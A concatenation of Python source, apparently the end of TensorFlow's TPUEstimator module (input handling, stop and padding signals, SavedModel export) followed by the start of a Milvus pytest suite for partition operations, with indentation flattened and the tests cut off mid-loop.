def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if (
tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr
): # pylint: disable=protected-access
raise ValueError(
"{}: Op {} depends on TPU computation {}, "
"which is not allowed.".format(self._message, op, c)
)
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope
)
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
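# Minimal sketch of how _CapturingContext is used (see _get_scaffold above):
# host-side graph construction run inside the context raises immediately if
# any op it creates depends on a TPU-replicated tensor. `build_host_ops` is
# an assumption for illustration.
def _example_capturing_context(build_host_ops):
  with _CapturingContext(message='Inside example host-side build'):
    return build_host_ops()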
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (
features is not None or labels is not None or signals is not None
):
raise RuntimeError(
"Internal Error: Either (features and labels) or "
"dataset should be provided, not both. Please file "
"bug"
)
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_util._DatasetInitializerHook(iterator)
# pylint: enable=protected-access
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError(
"Internal error: Must call dataset_initializer_hook "
"before calling features_and_labels(). Please file "
"a bug!"
)
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
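# Illustrative sketch only: how `_Inputs.from_input_fn` normalizes the three
# return-value shapes of input_fn supported by this file. The `features` and
# `labels` tensors are assumptions for the example.
def _example_inputs_wrapping(features, labels):
  # A (features, labels) tuple and bare features both become plain _Inputs.
  from_tuple = _Inputs.from_input_fn((features, labels))
  from_features = _Inputs.from_input_fn(features)
  # A Dataset is kept as-is; its iterator must be created via
  # dataset_initializer_hook() before features_and_labels() is usable.
  dataset = dataset_ops.Dataset.from_tensors({'x': features})
  from_dataset = _Inputs.from_input_fn(dataset)
  assert from_dataset.is_dataset
  return from_tuple, from_features, from_dataset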
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(
self, dataset, batch_size, add_padding=False, num_invocations_per_step=1
):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding
)
)
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding
)
)
else:
# We append (2 * num_invocations_per_step - 1) batches to exhaust the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding
)
)
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1
)
def _set_mask(data_dict):
signals = data_dict["signals"]
signals["padding_mask"] = array_ops.ones_like(signals["padding_mask"])
data_dict["signals"] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
"Internal Error: The previous inputs have not been properly "
"consumed. First call features_and_labels, then call signals."
)
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals["features"]
labels = inputs_with_signals.get("labels")
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
"Internal Error: The current inputs have not been properly "
"generated. First call features_and_labels, then call signals."
)
signals = self._current_inputs["signals"]
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that each returned
element is now a dictionary with `features`, `labels`, and `signals` as three
distinct keys. This provides a better structure, which eases the process of
decomposing the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = _PaddingSignals.pad_features_and_labels(
features, labels, batch_size
)
new_input_dict["features"] = features
if labels is not None:
new_input_dict["labels"] = labels
else:
new_input_dict["features"] = features
if labels is not None:
new_input_dict["labels"] = labels
padding_mask = None
new_input_dict["signals"] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask
).as_dict()
return new_input_dict
return _map_fn
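# A minimal usage sketch (not part of the original code): applying
# `insert_stopping_signal` to an assumed `tf.data` pipeline. `user_dataset` and
# the batch size of 64 are illustrative assumptions only. After the map, each
# element is a dict with `features`, optional `labels`, and a `signals` key,
# matching the structure built by `_map_fn` above.
#
#   signaled_dataset = user_dataset.map(
#       _InputsWithStoppingSignals.insert_stopping_signal(
#           stop=False, batch_size=64, add_padding=True))
#   # element: {'features': ..., 'labels': ..., 'signals': {'stopping': ...,
#   #           'padding_mask': ...}}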
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {"stopping": stopping}
if self._padding_mask is not None:
signals["padding_mask"] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals["stopping"][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the boolean check that scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL
)
else:
# In the non-Tensor case, this is called from a SessionRunHook, so we cannot
# modify the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
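# A minimal sketch (not part of the original code) of the two `should_stop`
# branches. The inputs below are illustrative assumptions: a graph Tensor goes
# through the `logical_and` path, while a plain Python bool (e.g. the value
# seen inside a `SessionRunHook`) is handled with `bool()`.
#
#   _StopSignals.should_stop(some_stopping_tensor)  # -> a bool Tensor
#   _StopSignals.should_stop(True)                   # -> True (stop)
#   _StopSignals.should_stop(False)                  # -> False (keep going)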
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message="The real batch size should not be greater than batch_size.",
)
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size
)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals["padding_mask"]
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors across all TPU cores and concat them back, it is
# important to ensure the real data is placed before the padded data, i.e.,
# order is preserved. Given that, the sliced padding mask should be all 0's.
# If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0
)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals)
)
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is a full batch or is part of the stopping signals,
# we skip slicing to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)),
)
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError("Cannot find any Tensor in features dict.")
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32),
],
axis=0,
)
padding_mask.set_shape((batch_size,))
return padding_mask
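# A worked illustration (not part of the original code) of the padding scheme,
# with assumed sizes: real_batch_size=3 and batch_size=8.
#
#   _PaddingSignals._padding_mask(3, 5, 8)  # -> [0, 0, 0, 1, 1, 1, 1, 1]
#
# `pad_features_and_labels` pads every feature/label tensor with 5 extra rows
# so the batch dimension becomes 8, and `slice_tensor_or_dict` later uses the
# mask to recover only the first 3 (real) rows.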
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
"{} The transfer size is larger than the protobuf limit. Please "
"consider to use Tensors with smaller shapes or reduce batch "
"size. Given:\n"
"{}".format(
message,
"\n".join(
[
" -- Key: {}, Shape: {}".format(k, v)
for k, v in tensor_structure.items()
]
),
)
)
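# A back-of-the-envelope example (not part of the original code), assuming
# `_ONE_GIGABYTE` is 1 << 30 bytes: a single float32 tensor of shape
# [1024, 1024, 64] transfers 1024 * 1024 * 64 * 4 = 268,435,456 bytes
# (256 MiB), which passes the check, while four such tensors in one dict add
# up to exactly 1 GiB and would trigger the ValueError above.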
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if isinstance(params, hparam.HParams):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
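# A minimal sketch (not part of the original code) of both branches handled by
# `_add_item_to_params`; the keys and values are illustrative assumptions.
#
#   _add_item_to_params({'learning_rate': 0.1}, 'batch_size', 64)
#   # plain dict: params['batch_size'] == 64
#
#   hp = hparam.HParams(learning_rate=0.1)
#   _add_item_to_params(hp, 'batch_size', 64)       # new key -> add_hparam
#   _add_item_to_params(hp, 'learning_rate', 0.01)  # existing key -> set_hparam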
def export_estimator_savedmodel(
estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None,
strip_default_attrs=False,
):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and
returns a `ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
strip_default_attrs: Boolean. If `True`, default-valued attributes will be
removed from the NodeDefs.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_savedmodel(
export_dir_base,
serving_input_receiver_fn,
assets_extra,
as_text,
checkpoint_path,
strip_default_attrs,
)
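# A minimal usage sketch (not part of the original code); `trained_estimator`,
# `serving_input_fn`, and the export path are illustrative assumptions.
#
#   export_dir = export_estimator_savedmodel(
#       estimator=trained_estimator,
#       export_dir_base='/tmp/tpu_export',
#       serving_input_receiver_fn=serving_input_fn)
#   # export_dir is the timestamped subdirectory containing the SavedModel.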
|
test_partition.py
|
from functools import reduce
from os import name
import threading
import pytest
from base.partition_wrapper import ApiPartitionWrapper
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from utils.util_log import test_log as log
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import PartitionErrorMessage
prefix = "partition_"
class TestPartitionParams(TestcaseBase):
""" Test case of partition interface in parameters"""
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default(self):
"""
target: verify create a partition
method: create a partition
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str("desc_")
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [""])
def test_partition_empty_name(self, partition_name):
"""
target: verify create a partition with empty name
method: create a partition with empty name
expected: raise exception
"""
# create a collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "Partition name should not be empty"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_empty_description(self):
"""
target: verify create a partition with empty description
method: create a partition with empty description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
partition_name = cf.gen_unique_str(prefix)
description = ""
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_max_description_length(self):
"""
target: verify create a partition with a 255-length name and a 2048-length description
method: create a partition with a 255-length name and a 2048-length description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
partition_name = cf.gen_str_by_length(255)
description = cf.gen_str_by_length(2048)
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True}
)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_dup_name(self):
"""
target: verify create partitions with duplicate names
method: create partitions with duplicate names
expected: 1. create successfully
2. the same partition returned with diff object ids
"""
# create a collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str()
partition_w1 = self.init_partition_wrap(collection_w, partition_name, description)
partition_w2 = self.init_partition_wrap(collection_w, partition_name, description)
# public check func to be extracted
assert id(partition_w1.partition) != id(partition_w2.partition)
assert partition_w1.name == partition_w2.name
assert partition_w1.description == partition_w2.description
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("description", ct.get_invalid_strs)
def test_partition_special_chars_description(self, description):
"""
target: verify create a partition with special characters in description
method: create a partition with special characters in description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default_name(self):
"""
target: verify create a partition with default name
method: 1. get the _default partition
2. create a partition with _default name
expected: the same partition returned
"""
# create collection
collection_w = self.init_collection_wrap()
# check that the default partition exists
assert collection_w.has_partition(ct.default_partition_name)[0]
# check that can get the _default partition
collection, _ = collection_w.partition(ct.default_partition_name)
# check that init the _default partition object
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert collection.name == partition_w.name
@pytest.mark.tags(CaseLabel.L2)
def test_partition_max_length_name(self):
"""
target: verify create a partition with a name longer than the max length (256 chars)
method: create a partition with a 256-char name
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_str_by_length(256)
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", ct.get_invalid_strs)
def test_partition_invalid_name(self, partition_name):
"""
target: verify create a partition with invalid name
method: create a partition with invalid names
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
# TODO: need an error code issue #5144 and assert independently
@pytest.mark.tags(CaseLabel.L2)
def test_partition_none_collection(self):
"""
target: verify create a partition with none collection
method: create a partition with none collection
expected: raise exception
"""
# create partition with collection is None
partition_name = cf.gen_unique_str(prefix)
self.partition_wrap.init_partition(collection=None, name=partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "must be pymilvus.Collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop(self):
"""
target: verify drop a partition in one collection
method: 1. create a partition in one collection
2. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
# check that the partition exists
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_respectively(self):
"""
target: test loading another partition after one partition is loaded
method: load partition1, then load partition2
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
partition_w1.load()
error = {ct.err_code: 1, ct.err_msg: f'load the partition after load collection is not supported'}
partition_w2.load(check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_partitions_after_release(self):
"""
target: test releasing partitions after loading them
method: load partitions and release partitions
expected: no exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w, name="partition_w1")
partition_w2 = self.init_partition_wrap(collection_w, name="partition_w2")
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
partition_names = ["partition_w1", "partition_w2"]
collection_w.load(partition_names)
collection_w.release(partition_names)
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_after_load_partition(self):
"""
target: test loading a partition after another loaded partition is released
method: load partition1 and release the partition1
load partition2
expected: no exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
partition_w1.load()
partition_w1.release()
partition_w2.load()
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_number_replicas(self, request):
if request.param == 1:
pytest.skip("1 is valid replica number")
if request.param is None:
pytest.skip("None is valid replica number")
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_replica_non_number(self, get_non_number_replicas):
"""
target: test load partition with non-number replicas
method: load with non-number replicas
expected: raise exceptions
"""
# create, insert
self._connect()
collection_w = self.init_collection_wrap()
partition_w = self.init_partition_wrap(collection_w)
partition_w.insert(cf.gen_default_list_data(nb=100))
# load with non-number replicas
error = {ct.err_code: 0, ct.err_msg: f"but expected one of: int, long"}
partition_w.load(replica_number=get_non_number_replicas, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("replicas", [0, -1, None])
def test_load_replica_invalid_number(self, replicas):
"""
target: test load partition with invalid replica number
method: load with invalid replica number
expected: load successfully with the default 1 replica
"""
# create, insert
self._connect()
collection_w = self.init_collection_wrap()
partition_w = self.init_partition_wrap(collection_w)
partition_w.insert(cf.gen_default_list_data())
assert partition_w.num_entities == ct.default_nb
partition_w.load(replica_number=replicas)
p_replicas = partition_w.get_replicas()[0]
assert len(p_replicas.groups) == 1
query_res, _ = partition_w.query(expr=f"{ct.default_int64_field_name} in [0]")
assert len(query_res) == 1
@pytest.mark.tags(CaseLabel.L2)
def test_load_replica_greater_than_querynodes(self):
"""
target: test load with more replicas than available querynodes
method: load with 3 replicas (only 2 querynodes)
expected: raise exception
"""
# create, insert
self._connect()
collection_w = self.init_collection_wrap()
partition_w = self.init_partition_wrap(collection_w)
partition_w.insert(cf.gen_default_list_data())
assert partition_w.num_entities == ct.default_nb
# load with 3 replicas
error = {ct.err_code: 1, ct.err_msg: f"no enough nodes to create replicas"}
partition_w.load(replica_number=3, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.ClusterOnly)
def test_load_replica_change(self):
"""
target: test load replica change
method: 1.load with replica 1
2.load with a new replica number
3.release partition
4.load with a new replica
expected: The second time successfully loaded with a new replica number
"""
# create, insert
self._connect()
collection_w = self.init_collection_wrap()
partition_w = self.init_partition_wrap(collection_w)
partition_w.insert(cf.gen_default_list_data())
assert partition_w.num_entities == ct.default_nb
partition_w.load(replica_number=1)
collection_w.query(expr=f"{ct.default_int64_field_name} in [0]", check_task=CheckTasks.check_query_results,
check_items={'exp_res': [{'int64': 0}]})
error = {ct.err_code: 5, ct.err_msg: f"Should release first then reload with the new number of replicas"}
partition_w.load(replica_number=2, check_task=CheckTasks.err_res, check_items=error)
partition_w.release()
partition_w.load(replica_number=2)
collection_w.query(expr=f"{ct.default_int64_field_name} in [0]", check_task=CheckTasks.check_query_results,
check_items={'exp_res': [{'int64': 0}]})
two_replicas, _ = collection_w.get_replicas()
assert len(two_replicas.groups) == 2
# verify the loaded segments cover 2 replicas (each segment ID appears twice, so the XOR of all IDs is 0) and twice the num entities
seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
num_entities = list(map(lambda seg: seg.num_rows, seg_info))
assert reduce(lambda x, y: x ^ y, seg_ids) == 0
assert reduce(lambda x, y: x + y, num_entities) == ct.default_nb * 2
@pytest.mark.tags(CaseLabel.ClusterOnly)
def test_partition_replicas_change_cross_partitions(self):
"""
target: test load with different replicas between partitions
method: 1.Create two partitions and insert data
2.Load two partitions with different replicas
expected: Raise an exception
"""
# Create two partitions and insert data
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_dataframe_data())
partition_w2.insert(cf.gen_default_dataframe_data(start=ct.default_nb))
assert collection_w.num_entities == ct.default_nb * 2
# load with different replicas
partition_w1.load(replica_number=1)
partition_w1.release()
partition_w2.load(replica_number=2)
# verify the two partitions report the same replica groups
replicas_1, _ = partition_w1.get_replicas()
replicas_2, _ = partition_w2.get_replicas()
group1_ids = list(map(lambda g: g.id, replicas_1.groups))
group2_ids = list(map(lambda g: g.id, replicas_2.groups))
assert sorted(group1_ids) == sorted(group2_ids)
# verify the loaded segments include 2 replicas of 1 partition
seg_info, _ = self.utility_wrap.get_query_segment_info(collection_w.name)
seg_ids = list(map(lambda seg: seg.segmentID, seg_info))
num_entities = list(map(lambda seg: seg.num_rows, seg_info))
assert reduce(lambda x, y: x ^ y, seg_ids) == 0
assert reduce(lambda x, y: x + y, num_entities) == ct.default_nb * 2
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release(self):
"""
target: verify release partition
method: 1. create a collection and two partitions
2. insert data into each partition
3. flush and load the partition1
4. release partition1
5. release partition2
expected: 1. the 1st partition is released
2. the 2nd partition is released
"""
# create collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
# insert data to two partition
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
# load two partitions
partition_w1.load()
# search partition1
search_vectors = cf.gen_vectors(1, ct.default_dim)
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res1) == 1
# release the first partition
partition_w1.release()
partition_w2.release()
# check result
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "partitions have been released"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("data", [cf.gen_default_dataframe_data(10),
cf.gen_default_list_data(10),
cf.gen_default_tuple_data(10)])
def test_partition_insert(self, data):
"""
target: verify insert entities multiple times
method: 1. create a collection and a partition
2. partition.insert(data)
3. insert data again
expected: insert data successfully
"""
nums = 10
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name,
"is_empty": True, "num_entities": 0}
)
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name]) # don't need flush for issue #5737
assert not partition_w.is_empty
assert partition_w.num_entities == nums
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert not partition_w.is_empty
assert partition_w.num_entities == (nums + nums)
class TestPartitionOperations(TestcaseBase):
""" Test case of partition interface in operations """
@pytest.mark.tags(CaseLabel.L1)
def test_partition_dropped_collection(self):
"""
target: verify create partition against a dropped collection
method: 1. create a collection
2. drop collection
3. create partition in collection
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# drop collection
collection_w.drop()
# create partition failed
self.partition_wrap.init_partition(collection_w.collection, cf.gen_unique_str(prefix),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L2)
def test_partition_same_name_in_diff_collections(self):
"""
target: verify create partitions with same name in diff collections
method: 1. create a partition in collection1
2. create a partition in collection2
expected: create successfully
"""
# create two collections
collection_w1 = self.init_collection_wrap()
collection_w2 = self.init_collection_wrap()
# create 2 partitions in 2 diff collections
partition_name = cf.gen_unique_str(prefix)
self.init_partition_wrap(collection_wrap=collection_w1, name=partition_name)
self.init_partition_wrap(collection_wrap=collection_w2, name=partition_name)
# check result
assert collection_w1.has_partition(partition_name)[0]
assert collection_w2.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_multi_partitions_in_collection(self):
"""
target: verify create multiple partitions in one collection
method: create multiple partitions in one collection
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
for _ in range(10):
partition_name = cf.gen_unique_str(prefix)
# create partition with different names and check the partition exists
